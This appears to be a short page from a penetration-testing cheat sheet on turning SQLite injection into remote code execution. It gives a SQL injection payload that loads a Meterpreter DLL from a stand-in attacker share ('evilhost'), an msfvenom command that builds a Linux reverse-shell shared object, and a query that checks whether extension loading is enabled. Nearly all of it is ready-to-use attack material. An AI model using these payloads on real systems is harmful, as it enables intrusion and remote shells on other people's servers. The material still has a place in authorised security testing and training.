Sqlite DB

// sqlite db to own ...
SQLite RCE
Arbitrary Code Execution	load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration

https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet


You can use this query to check if extension loading is enabled by default:
SELECT sqlite_compileoption_used('ENABLE_LOAD_EXTENSION');

?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1337 PrependFork=true -f elf-so -o ELFSO

Previousjust Nextmsfvenom

Last updated 2 years ago

Was this helpful?